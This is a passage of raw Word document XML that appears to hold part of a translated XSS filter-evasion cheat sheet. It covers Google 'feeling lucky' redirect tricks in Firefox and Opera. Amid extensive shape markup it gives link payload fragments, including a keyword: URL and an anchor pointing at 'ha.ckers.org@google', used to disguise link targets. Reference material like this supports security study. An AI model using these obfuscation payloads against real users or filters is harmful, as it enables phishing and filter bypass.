                                <a:pt x="720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7CC16" id="Freeform 519" o:spid="_x0000_s1026" style="position:absolute;margin-left:132.95pt;margin-top:27.1pt;width:37.1pt;height:9.15pt;z-index:-175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" path="m720,182r-699,l18,181,,161r,-3l,21,21,,720,r21,21l741,161r-18,20l720,182xe" fillcolor="#f5f5f5" stroked="f">
                <v:path arrowok="t" o:connecttype="custom" o:connectlocs="457200,459740;13335,459740;11430,459105;0,446405;0,444500;0,357505;13335,344170;457200,344170;470535,357505;470535,446405;459105,459105;457200,459740" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:t>Firefox uses Google's "feeling lucky" function to redirect the user to any keywords you type in. So if your exploitable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1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Firefox's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t>keyword:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Lucida Console"/>
          <w:color w:val="36454E"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="15"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>protocol.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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concatenate</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>several</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>keywords</w:t>
      </w:r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something</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3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</w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1785"/>
        <w:jc w:val="both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15886848" behindDoc="0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4445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1010920" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="515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0920" cy="116205"/>
                          <a:chOff x="1614" y="7"/>
                          <a:chExt cx="1592" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="516" name="Freeform 518"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="7"/>
                            <a:ext cx="1592" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3185 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 1592"/>
                              <a:gd name="T2" fmla="+- 0 189 7"/>
                              <a:gd name="T3" fmla="*/ 189 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 1592"/>
                              <a:gd name="T6" fmla="+- 0 189 7"/>
                              <a:gd name="T7" fmla="*/ 189 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 1592"/>
                              <a:gd name="T10" fmla="+- 0 189 7"/>
                              <a:gd name="T11" fmla="*/ 189 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 1592"/>
                              <a:gd name="T14" fmla="+- 0 168 7"/>
                              <a:gd name="T15" fmla="*/ 168 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 1592"/>
                              <a:gd name="T18" fmla="+- 0 165 7"/>
                              <a:gd name="T19" fmla="*/ 165 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 1592"/>
                              <a:gd name="T22" fmla="+- 0 28 7"/>
                              <a:gd name="T23" fmla="*/ 28 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 1592"/>
                              <a:gd name="T26" fmla="+- 0 7 7"/>
                              <a:gd name="T27" fmla="*/ 7 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3185 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 1592"/>
                              <a:gd name="T30" fmla="+- 0 7 7"/>
                              <a:gd name="T31" fmla="*/ 7 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3206 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 1592"/>
                              <a:gd name="T34" fmla="+- 0 28 7"/>
                              <a:gd name="T35" fmla="*/ 28 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3206 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 1592"/>
                              <a:gd name="T38" fmla="+- 0 168 7"/>
                              <a:gd name="T39" fmla="*/ 168 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3188 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 1592"/>
                              <a:gd name="T42" fmla="+- 0 189 7"/>
                              <a:gd name="T43" fmla="*/ 189 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3185 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 1592"/>
                              <a:gd name="T46" fmla="+- 0 189 7"/>
                              <a:gd name="T47" fmla="*/ 1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183">
                                <a:moveTo>
                                  <a:pt x="157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571" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1592" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1592" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1574" y="182"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="157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7"/>
                            <a:ext cx="159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keyword:XSS+RSnake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6" o:spid="_x0000_s1908" style="position:absolute;left:0;text-align:left;margin-left:80.7pt;margin-top:.35pt;width:79.6pt;height:9.15pt;z-index:15886848;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,7" coordsize="159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">
                <v:shape id="Freeform 518" o:spid="_x0000_s1909" style="position:absolute;left:1614;top:7;width:1592;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="159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dd08MA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESP3YrCMBSE74V9h3AW9k5TFUW7jaLCrj93ah/g0Jxt&#10;i81JSaLWt98IgpfDzHzDZMvONOJGzteWFQwHCQjiwuqaSwX5+ac/A+EDssbGMil4kIfl4qOXYart&#10;nY90O4VSRAj7FBVUIbSplL6oyKAf2JY4en/WGQxRulJqh/cIN40cJclUGqw5LlTY0qai4nK6GgV7&#10;93toD+OkOeq1380vOV8f461SX5/d6htEoC68w6/2TiuYDKfwPBOP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dd08MAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m1571,182l21,182r-3,l,161r,-3l,21,21,,1571,r21,21l1592,161r-18,21l1571,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="1571,189;21,189;18,189;0,168;0,165;0,28;21,7;1571,7;1592,28;1592,168;1574,189;1571,189" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 517" o:spid="_x0000_s1910" type="#_x0000_t202" style="position:absolute;left:1614;top:7;width:159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HzX8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HzX8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keyword:XSS+RSnake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for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>instance.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longer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>works</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8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Firefox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2.0.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="8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4246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1435100" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="512" name="Group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5100" cy="116205"/>
                          <a:chOff x="1614" y="240"/>
                          <a:chExt cx="2260" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="513" name="Freeform 515"/>
                        <wps:cNvSpPr>
                          <a:spLocks/>
                        </wps:cNvSpPr>
                        <wps:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="1614" y="239"/>
                            <a:ext cx="2260" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 3853 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 2260"/>
                              <a:gd name="T2" fmla="+- 0 422 240"/>
                              <a:gd name="T3" fmla="*/ 422 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 2260"/>
                              <a:gd name="T6" fmla="+- 0 422 240"/>
                              <a:gd name="T7" fmla="*/ 422 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 2260"/>
                              <a:gd name="T10" fmla="+- 0 421 240"/>
                              <a:gd name="T11" fmla="*/ 421 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 2260"/>
                              <a:gd name="T14" fmla="+- 0 401 240"/>
                              <a:gd name="T15" fmla="*/ 401 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 2260"/>
                              <a:gd name="T18" fmla="+- 0 397 240"/>
                              <a:gd name="T19" fmla="*/ 397 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 2260"/>
                              <a:gd name="T22" fmla="+- 0 261 240"/>
                              <a:gd name="T23" fmla="*/ 261 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 2260"/>
                              <a:gd name="T26" fmla="+- 0 240 240"/>
                              <a:gd name="T27" fmla="*/ 240 h 183"/>
                              <a:gd name="T28" fmla="+- 0 3853 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 2260"/>
                              <a:gd name="T30" fmla="+- 0 240 240"/>
                              <a:gd name="T31" fmla="*/ 240 h 183"/>
                              <a:gd name="T32" fmla="+- 0 3874 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 2260"/>
                              <a:gd name="T34" fmla="+- 0 261 240"/>
                              <a:gd name="T35" fmla="*/ 261 h 183"/>
                              <a:gd name="T36" fmla="+- 0 3874 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 2260"/>
                              <a:gd name="T38" fmla="+- 0 401 240"/>
                              <a:gd name="T39" fmla="*/ 401 h 183"/>
                              <a:gd name="T40" fmla="+- 0 3856 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 2260"/>
                              <a:gd name="T42" fmla="+- 0 421 240"/>
                              <a:gd name="T43" fmla="*/ 421 h 183"/>
                              <a:gd name="T44" fmla="+- 0 3853 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 2260"/>
                              <a:gd name="T46" fmla="+- 0 422 240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60" h="183">
                                <a:moveTo>
                                  <a:pt x="223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239" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2260" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2260" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2242" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="22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Text Box 514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39"/>
                            <a:ext cx="226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4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HREF="//google"&gt;XSS&lt;/A&gt;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3" o:spid="_x0000_s1911" style="position:absolute;margin-left:80.7pt;margin-top:12pt;width:113pt;height:9.15pt;z-index:-15574016;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,240" coordsize="226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">
                <v:shape id="Freeform 515" o:spid="_x0000_s1912" style="position:absolute;left:1614;top:239;width:2260;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="226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SzRcYA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPT4vCMBTE7wt+h/AEb2uq4irVKOIi6GEP/jno7dE8&#10;22rz0m2itvvpjSDscZiZ3zDTeW0KcafK5ZYV9LoRCOLE6pxTBYf96nMMwnlkjYVlUtCQg/ms9THF&#10;WNsHb+m+86kIEHYxKsi8L2MpXZKRQde1JXHwzrYy6IOsUqkrfAS4KWQ/ir6kwZzDQoYlLTNKrrub&#10;UbAZpY2/3L5/j/3t6dQs7aUxP39Kddr1YgLCU+3/w+/2WisY9gbwOhOOgJ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SzRcYAAADcAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m2239,182l21,182r-3,-1l,161r,-4l,21,21,,2239,r21,21l2260,161r-18,20l2239,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="2239,422;21,422;18,421;0,401;0,397;0,261;21,240;2239,240;2260,261;2260,401;2242,421;2239,422" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 514" o:spid="_x0000_s1913" type="#_x0000_t202" style="position:absolute;left:1614;top:239;width:226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NtKM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NtKM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54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HREF="//google"&gt;XSS&lt;/A&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"feeling lucky"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>part 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="166"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uses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very</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>tiny</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>trick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appears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Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>only,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because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it's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>implementation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"feeling</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>lucky"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>function.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Unlike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next</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6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does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work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Opera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>because</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Opera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>believes</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="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old</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Basic</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>Auth</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>phishing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>attack,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not.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>It's</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>simply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malformed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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click</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>okay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dialogue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work,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="5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result</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:sectPr w:rsidR="00AC7743">
          <w:pgSz w:w="11920" w:h="16860"/>
          <w:pgMar w:top="144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72" w:line="333" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="130"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/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erroneous</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>dialogue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>box</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7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am</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>saying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supported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Opera,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longer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>supported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Firefox</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="6"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>as</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-3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2.0: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4656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105410</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2399665" cy="116205"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="509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9665" cy="116205"/>
                          <a:chOff x="1614" y="166"/>
                          <a:chExt cx="3779" cy="183"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="510" name="Freeform 512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3779" cy="183"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst>
                              <a:gd name="T0" fmla="+- 0 5372 1614"/>
                              <a:gd name="T1" fmla="*/ T0 w 3779"/>
                              <a:gd name="T2" fmla="+- 0 348 166"/>
                              <a:gd name="T3" fmla="*/ 348 h 183"/>
                              <a:gd name="T4" fmla="+- 0 1635 1614"/>
                              <a:gd name="T5" fmla="*/ T4 w 3779"/>
                              <a:gd name="T6" fmla="+- 0 348 166"/>
                              <a:gd name="T7" fmla="*/ 348 h 183"/>
                              <a:gd name="T8" fmla="+- 0 1632 1614"/>
                              <a:gd name="T9" fmla="*/ T8 w 3779"/>
                              <a:gd name="T10" fmla="+- 0 347 166"/>
                              <a:gd name="T11" fmla="*/ 347 h 183"/>
                              <a:gd name="T12" fmla="+- 0 1614 1614"/>
                              <a:gd name="T13" fmla="*/ T12 w 3779"/>
                              <a:gd name="T14" fmla="+- 0 327 166"/>
                              <a:gd name="T15" fmla="*/ 327 h 183"/>
                              <a:gd name="T16" fmla="+- 0 1614 1614"/>
                              <a:gd name="T17" fmla="*/ T16 w 3779"/>
                              <a:gd name="T18" fmla="+- 0 323 166"/>
                              <a:gd name="T19" fmla="*/ 323 h 183"/>
                              <a:gd name="T20" fmla="+- 0 1614 1614"/>
                              <a:gd name="T21" fmla="*/ T20 w 3779"/>
                              <a:gd name="T22" fmla="+- 0 187 166"/>
                              <a:gd name="T23" fmla="*/ 187 h 183"/>
                              <a:gd name="T24" fmla="+- 0 1635 1614"/>
                              <a:gd name="T25" fmla="*/ T24 w 3779"/>
                              <a:gd name="T26" fmla="+- 0 166 166"/>
                              <a:gd name="T27" fmla="*/ 166 h 183"/>
                              <a:gd name="T28" fmla="+- 0 5372 1614"/>
                              <a:gd name="T29" fmla="*/ T28 w 3779"/>
                              <a:gd name="T30" fmla="+- 0 166 166"/>
                              <a:gd name="T31" fmla="*/ 166 h 183"/>
                              <a:gd name="T32" fmla="+- 0 5393 1614"/>
                              <a:gd name="T33" fmla="*/ T32 w 3779"/>
                              <a:gd name="T34" fmla="+- 0 187 166"/>
                              <a:gd name="T35" fmla="*/ 187 h 183"/>
                              <a:gd name="T36" fmla="+- 0 5393 1614"/>
                              <a:gd name="T37" fmla="*/ T36 w 3779"/>
                              <a:gd name="T38" fmla="+- 0 327 166"/>
                              <a:gd name="T39" fmla="*/ 327 h 183"/>
                              <a:gd name="T40" fmla="+- 0 5375 1614"/>
                              <a:gd name="T41" fmla="*/ T40 w 3779"/>
                              <a:gd name="T42" fmla="+- 0 347 166"/>
                              <a:gd name="T43" fmla="*/ 347 h 183"/>
                              <a:gd name="T44" fmla="+- 0 5372 1614"/>
                              <a:gd name="T45" fmla="*/ T44 w 3779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779" h="183">
                                <a:moveTo>
                                  <a:pt x="375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758" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3779" y="21"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3779" y="161"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="3761" y="181"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="375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377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</w:t>
                              </w:r>
                              <w:hyperlink r:id="rId70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http://ha.ckers.org@google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"&gt;XSS&lt;/A&gt;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0" o:spid="_x0000_s1914" style="position:absolute;margin-left:80.7pt;margin-top:8.3pt;width:188.95pt;height:9.15pt;z-index:-15569920;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:text" coordorigin="1614,166" coordsize="377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">
                <v:shape id="Freeform 512" o:spid="_x0000_s1915" style="position:absolute;left:1614;top:165;width:3779;height:183;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="377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fqssIA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbERPz2vCMBS+D/wfwhN2m6miY1SjFMHhYAzWeent2Tzb&#10;YvNSkqzN/vvlMNjx4/u9O0TTi5Gc7ywrWC4yEMS11R03Ci5fp6cXED4ga+wtk4If8nDYzx52mGs7&#10;8SeNZWhECmGfo4I2hCGX0tctGfQLOxAn7madwZCga6R2OKVw08tVlj1Lgx2nhhYHOrZU38tvo0Bf&#10;7UgTx01RVNXbTX+s3tfxVanHeSy2IALF8C/+c5+1gs0yzU9n0hG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5+qywgAAANwAAAAPAAAAAAAAAAAAAAAAAJgCAABkcnMvZG93&#10;bnJldi54bWxQSwUGAAAAAAQABAD1AAAAhwMAAAAA&#10;" path="m3758,182l21,182r-3,-1l,161r,-4l,21,21,,3758,r21,21l3779,161r-18,20l3758,182xe" fillcolor="#f5f5f5" stroked="f">
                  <v:path arrowok="t" o:connecttype="custom" o:connectlocs="3758,348;21,348;18,347;0,327;0,323;0,187;21,166;3758,166;3779,187;3779,327;3761,347;3758,348" o:connectangles="0,0,0,0,0,0,0,0,0,0,0,0"/>
                </v:shape>
                <v:shape id="Text Box 511" o:spid="_x0000_s1916" type="#_x0000_t202" style="position:absolute;left:1614;top:165;width:377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TOsMUA&#10;AADcAAAADwAAAGRycy9kb3ducmV2LnhtbESPQWvCQBSE74X+h+UJvdVNhEqNbkRKBaFQjPHQ42v2&#10;JVnMvk2zq6b/visUPA4z8w2zWo+2ExcavHGsIJ0mIIgrpw03Co7l9vkVhA/IGjvHpOCXPKzzx4cV&#10;ZtpduaDLITQiQthnqKANoc+k9FVLFv3U9cTRq91gMUQ5NFIPeI1w28lZksylRcNxocWe3lqqToez&#10;VbD54uLd/Hx+74u6MGW5SPhjflLqaTJuliACjeEe/m/vtIKXNIXbmXg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M6w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</w:t>
                        </w:r>
                        <w:hyperlink r:id="rId71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http://ha.ckers.org@google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"&gt;XSS&lt;/A&gt;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Balk4"/>
      </w:pPr>
      <w:r>
        <w:t>Google</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>"feeling lucky"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>part 3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00AC7743">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:before="6"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00AC7743" w:rsidRDefault="00EF5896">
      <w:pPr>
        <w:pStyle w:val="GvdeMetni"/>
        <w:spacing w:line="326" w:lineRule="auto"/>
        <w:ind w:left="154" w:right="434"/>
      </w:pPr>
      <w:r>
        <w:t>This</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uses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malformed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="7"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>URL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appears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work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Firefox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Opera</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="8"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
